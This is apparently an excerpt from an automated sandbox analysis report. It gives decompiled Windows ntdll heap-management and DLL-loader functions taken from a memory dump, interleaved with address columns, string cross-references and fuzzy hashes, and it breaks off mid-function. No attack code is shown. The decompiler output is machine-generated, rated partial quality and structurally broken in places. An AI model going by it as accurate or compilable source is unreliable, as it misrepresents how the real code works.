                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ea978
                                                                                                                          0x009ea978
                                                                                                                          0x009ea97b
                                                                                                                          0x009ea981
                                                                                                                          0x009ea996
                                                                                                                          0x009ea998
                                                                                                                          0x009ea99f
                                                                                                                          0x009ea9a2
                                                                                                                          0x00a3238a
                                                                                                                          0x009ea9a8
                                                                                                                          0x009ea9a8
                                                                                                                          0x009ea9a8
                                                                                                                          0x009ea9aa
                                                                                                                          0x009ea9ad
                                                                                                                          0x009ea9b0
                                                                                                                          0x009ea9bb
                                                                                                                          0x009ea9be
                                                                                                                          0x009ea9c7
                                                                                                                          0x009ea9c9
                                                                                                                          0x009ea9c9
                                                                                                                          0x009ea9cc
                                                                                                                          0x009ea9d1
                                                                                                                          0x009eaa6d
                                                                                                                          0x009eaa70
                                                                                                                          0x009eaa73
                                                                                                                          0x009eaa75
                                                                                                                          0x009eaa79
                                                                                                                          0x009eaa7e
                                                                                                                          0x009eaa82
                                                                                                                          0x009eaa8f
                                                                                                                          0x009eaa94
                                                                                                                          0x009eaa96
                                                                                                                          0x00a32392
                                                                                                                          0x00a323a1
                                                                                                                          0x00a323a1
                                                                                                                          0x009eaa9c
                                                                                                                          0x009eaa9f
                                                                                                                          0x009eaaa2
                                                                                                                          0x009eaaa2
                                                                                                                          0x009eaaa8
                                                                                                                          0x009eaaab
                                                                                                                          0x009eaaaf
                                                                                                                          0x00000000
                                                                                                                          0x009eaab5
                                                                                                                          0x00000000
                                                                                                                          0x009eaab5
                                                                                                                          0x009ea9d7
                                                                                                                          0x009ea9d7
                                                                                                                          0x009ea9da
                                                                                                                          0x009ea9e0
                                                                                                                          0x009ea9e3
                                                                                                                          0x009ea9e6
                                                                                                                          0x009ea9e9
                                                                                                                          0x009ea9eb
                                                                                                                          0x009ea9fd
                                                                                                                          0x009ea9fd
                                                                                                                          0x00000000
                                                                                                                          0x009ea9eb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ea983
                                                                                                                          0x009ea983
                                                                                                                          0x009ea983
                                                                                                                          0x009ea987
                                                                                                                          0x009ea995
                                                                                                                          0x009ea995
                                                                                                                          0x009ea995
                                                                                                                          0x009ea995
                                                                                                                          0x009ea989
                                                                                                                          0x009ea98e
                                                                                                                          0x00000000
                                                                                                                          0x009ea990
                                                                                                                          0x00000000
                                                                                                                          0x009ea990
                                                                                                                          0x009ea98e
                                                                                                                          0x00000000
                                                                                                                          0x009ea983
                                                                                                                          0x009ea972
                                                                                                                          0x009ea90a
                                                                                                                          0x009eaa34
                                                                                                                          0x009eaa34
                                                                                                                          0x009eaa40
                                                                                                                          0x009eaa43
                                                                                                                          0x009eaa46
                                                                                                                          0x009eaa4d
                                                                                                                          0x00a323ab
                                                                                                                          0x00a323b2
                                                                                                                          0x00a323b8
                                                                                                                          0x00a323be
                                                                                                                          0x00a323c3
                                                                                                                          0x00a323c5
                                                                                                                          0x00a323cb
                                                                                                                          0x00a323d1
                                                                                                                          0x00a323d5
                                                                                                                          0x00a323f6
                                                                                                                          0x00a323fb
                                                                                                                          0x00a323d7
                                                                                                                          0x00a323ec
                                                                                                                          0x00a323f1
                                                                                                                          0x00a32403
                                                                                                                          0x00a32408
                                                                                                                          0x00a32410
                                                                                                                          0x00a32417
                                                                                                                          0x00a32422
                                                                                                                          0x00a32422
                                                                                                                          0x00a32417
                                                                                                                          0x00a323c5
                                                                                                                          0x00a323b2
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00A322F3
                                                                                                                          • HEAP[%wZ]: , xrefs: 00A322D7, 00A323E7
                                                                                                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00A32403
                                                                                                                          • HEAP: , xrefs: 00A322E6, 00A323F6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                          • API String ID: 0-1657114761
                                                                                                                          • Opcode ID: e8c2d06d1c7db2bb479e600830a8f460346f7cc05a0d0c009b32f82683611aec
                                                                                                                          • Instruction ID: 55e20b35901a7acd6516eb7ec399630f4874e1a2beebe1efb7cf44adb79afd8e
                                                                                                                          • Opcode Fuzzy Hash: e8c2d06d1c7db2bb479e600830a8f460346f7cc05a0d0c009b32f82683611aec
                                                                                                                          • Instruction Fuzzy Hash: FCD1CF30A002859FDB19CF69C490BBAB7F6FF98300F158569E85A9B352E334BC45CB52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009EA229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 69%
                                                                                                                          			E009EA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E009EDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E00A09730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E00A8A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E00A09660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E009CB150();
					} else {
						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E009CB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E009E7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E00A8138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E009E7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E009E7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E00A81582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E009E7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E009E7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E00A81582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E00A1D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                                                                                          0x009ea229
                                                                                                                          0x009ea231
                                                                                                                          0x009ea23f
                                                                                                                          0x009ea242
                                                                                                                          0x009ea244
                                                                                                                          0x009ea24c
                                                                                                                          0x009ea255
                                                                                                                          0x009ea25a
                                                                                                                          0x009ea25f
                                                                                                                          0x00a31c76
                                                                                                                          0x00a31c78
                                                                                                                          0x00a31c7e
                                                                                                                          0x00a31c7f
                                                                                                                          0x00a31c81
                                                                                                                          0x00a31c82
                                                                                                                          0x00a31c84
                                                                                                                          0x00a31c89
                                                                                                                          0x00a31c8b
                                                                                                                          0x00a31c9e
                                                                                                                          0x00a31c9e
                                                                                                                          0x00a31cab
                                                                                                                          0x00a31cb2
                                                                                                                          0x00000000
                                                                                                                          0x00a31cb2
                                                                                                                          0x00a31c8d
                                                                                                                          0x00a31c92
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a31c94
                                                                                                                          0x00a31c98
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a31c98
                                                                                                                          0x009ea265
                                                                                                                          0x009ea265
                                                                                                                          0x009ea266
                                                                                                                          0x009ea26f
                                                                                                                          0x009ea270
                                                                                                                          0x009ea276
                                                                                                                          0x009ea277
                                                                                                                          0x009ea279
                                                                                                                          0x009ea27e
                                                                                                                          0x009ea282
                                                                                                                          0x00a31db5
                                                                                                                          0x00a31dbb
                                                                                                                          0x00a31dc1
                                                                                                                          0x00a31dc5
                                                                                                                          0x00a31de4
                                                                                                                          0x00a31de9
                                                                                                                          0x00a31dc7
                                                                                                                          0x00a31ddc
                                                                                                                          0x00a31de1
                                                                                                                          0x00a31def
                                                                                                                          0x00a31df3
                                                                                                                          0x00a31df7
                                                                                                                          0x00a31dfe
                                                                                                                          0x00a31e06
                                                                                                                          0x009ea302
                                                                                                                          0x009ea308
                                                                                                                          0x009ea308
                                                                                                                          0x009ea288
                                                                                                                          0x009ea28d
                                                                                                                          0x009ea294
                                                                                                                          0x00a31cc1
                                                                                                                          0x009ea29a
                                                                                                                          0x009ea29a
                                                                                                                          0x009ea29a
                                                                                                                          0x009ea29f
                                                                                                                          0x00a31ccb
                                                                                                                          0x00a31cd1
                                                                                                                          0x00a31cd8
                                                                                                                          0x00a31cea
                                                                                                                          0x00a31cea
                                                                                                                          0x00a31cd8
                                                                                                                          0x009ea2a9
                                                                                                                          0x009ea2af
                                                                                                                          0x009ea2bc
                                                                                                                          0x00a31cfd
                                                                                                                          0x009ea2c2
                                                                                                                          0x009ea2c2
                                                                                                                          0x009ea2c2
                                                                                                                          0x009ea2c7
                                                                                                                          0x00a31d07
                                                                                                                          0x00a31d0d
                                                                                                                          0x00a31d14
                                                                                                                          0x00a31d1f
                                                                                                                          0x00a31d21
                                                                                                                          0x00a31d2c
                                                                                                                          0x00a31d2c
                                                                                                                          0x00a31d2c
                                                                                                                          0x00a31d47
                                                                                                                          0x00a31d47
                                                                                                                          0x00a31d14
                                                                                                                          0x009ea2cd
                                                                                                                          0x009ea2d2
                                                                                                                          0x009ea2d9
                                                                                                                          0x00a31d5a
                                                                                                                          0x009ea2df
                                                                                                                          0x009ea2df
                                                                                                                          0x009ea2df
                                                                                                                          0x009ea2e4
                                                                                                                          0x00a31d69
                                                                                                                          0x00a31d6b
                                                                                                                          0x00a31d76
                                                                                                                          0x00a31d76
                                                                                                                          0x00a31d76
                                                                                                                          0x00a31d91
                                                                                                                          0x00a31d91
                                                                                                                          0x009ea2ea
                                                                                                                          0x009ea2f0
                                                                                                                          0x009ea2f5
                                                                                                                          0x00a31da8
                                                                                                                          0x00a31dad
                                                                                                                          0x00a31dad
                                                                                                                          0x009ea2fd
                                                                                                                          0x009ea300
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                          • API String ID: 2994545307-2586055223
                                                                                                                          • Opcode ID: de3441dc214781d7e2107a6780d3cc01f38a22a653bbfa9a333d49a48bc6a00d
                                                                                                                          • Instruction ID: a7c51b08578b5bbe1fb0450c07dc5c591f03a80d21d1bb340b908311a29a4095
                                                                                                                          • Opcode Fuzzy Hash: de3441dc214781d7e2107a6780d3cc01f38a22a653bbfa9a333d49a48bc6a00d
                                                                                                                          • Instruction Fuzzy Hash: 525103322056809FD722DB69CC45F67B7E8FF81B50F180868F5659B2A2D734EC40CB62
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009F8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 44%
                                                                                                                          			E009F8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xabd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xab8464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xab5780 & 0x00000003) != 0) {
							E00A45510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xab5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00A0B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xab7984; // 0x442c18
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xab8464; // 0x74790110
					 *0xabb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E009F9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xab5780 & 0x00000005) != 0) {
						_push(_t49);
						E00A45510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                                                          0x009f8e0f
                                                                                                                          0x009f8e16
                                                                                                                          0x009f8e19
                                                                                                                          0x009f8e1b
                                                                                                                          0x009f8e21
                                                                                                                          0x009f8e7f
                                                                                                                          0x009f8e85
                                                                                                                          0x00a39354
                                                                                                                          0x00a3936c
                                                                                                                          0x00a39371
                                                                                                                          0x00a3937b
                                                                                                                          0x00a39381
                                                                                                                          0x00a39381
                                                                                                                          0x00a3937b
                                                                                                                          0x009f8e9d
                                                                                                                          0x009f8e9d
                                                                                                                          0x009f8e29
                                                                                                                          0x009f8e2c
                                                                                                                          0x009f8e38
                                                                                                                          0x009f8e3e
                                                                                                                          0x009f8e43
                                                                                                                          0x009f8eb5
                                                                                                                          0x009f8eb9
                                                                                                                          0x00a392aa
                                                                                                                          0x00a392af
                                                                                                                          0x00a392e8
                                                                                                                          0x00a392e8
                                                                                                                          0x00a392af
                                                                                                                          0x009f8eb9
                                                                                                                          0x009f8e45
                                                                                                                          0x009f8e53
                                                                                                                          0x009f8e5b
                                                                                                                          0x009f8e5f
                                                                                                                          0x009f8e78
                                                                                                                          0x009f8e78
                                                                                                                          0x009f8e7d
                                                                                                                          0x009f8ec3
                                                                                                                          0x009f8ecd
                                                                                                                          0x009f8ed2
                                                                                                                          0x009f8ed2
                                                                                                                          0x009f8ec5
                                                                                                                          0x009f8ec5
                                                                                                                          0x00000000
                                                                                                                          0x009f8e7d
                                                                                                                          0x009f8e67
                                                                                                                          0x009f8ea4
                                                                                                                          0x00a3931a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a39320
                                                                                                                          0x009f8ea4
                                                                                                                          0x009f8e70
                                                                                                                          0x00a39325
                                                                                                                          0x00a39340
                                                                                                                          0x00a39345
                                                                                                                          0x00a39345
                                                                                                                          0x009f8e76
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00A3932A
                                                                                                                          • LdrpFindDllActivationContext, xrefs: 00A39331, 00A3935D
                                                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 00A39357
                                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 00A3933B, 00A39367
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                          • API String ID: 0-3779518884
                                                                                                                          • Opcode ID: dace684233ef980ebb2de44e8a5f660aa7bd204011067faf05e881b77eaf308c
                                                                                                                          • Instruction ID: 249f88a7ca2075d8959aa4ab5c24f8c94638f741df32ae99c22dee4f01ab55b3
                                                                                                                          • Opcode Fuzzy Hash: dace684233ef980ebb2de44e8a5f660aa7bd204011067faf05e881b77eaf308c
                                                                                                                          • Instruction Fuzzy Hash: 7741F632E0031D9FDBA5BB589C4DA7BB6A8AB51348F194569EA18571A1EFB05C8083C1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A849A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                          • API String ID: 2994545307-336120773
                                                                                                                          • Opcode ID: 278bc354e03ba717d9ab04d049e05d395612c58db68ec6050baa0f3a743322d8
                                                                                                                          • Instruction ID: 872eb543459abb6e57ac2931fcaa8d5cde5cac6f74b635e7691c42d8537b9727
                                                                                                                          • Opcode Fuzzy Hash: 278bc354e03ba717d9ab04d049e05d395612c58db68ec6050baa0f3a743322d8
                                                                                                                          • Instruction Fuzzy Hash: 87312631684215EFC714FB58C886F67B3A8EF497A4F184059F4069F2A2D770AC44C7A9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009E99BF, Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E009E99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E00A7FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E00A8A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E00A1D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E009CB150();
										} else {
											E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E009CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0xab6378 = 1;
											asm("int3");
											 *0xab6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E009EA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E009EA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E009EBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E00A8A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E009EA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E009EA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
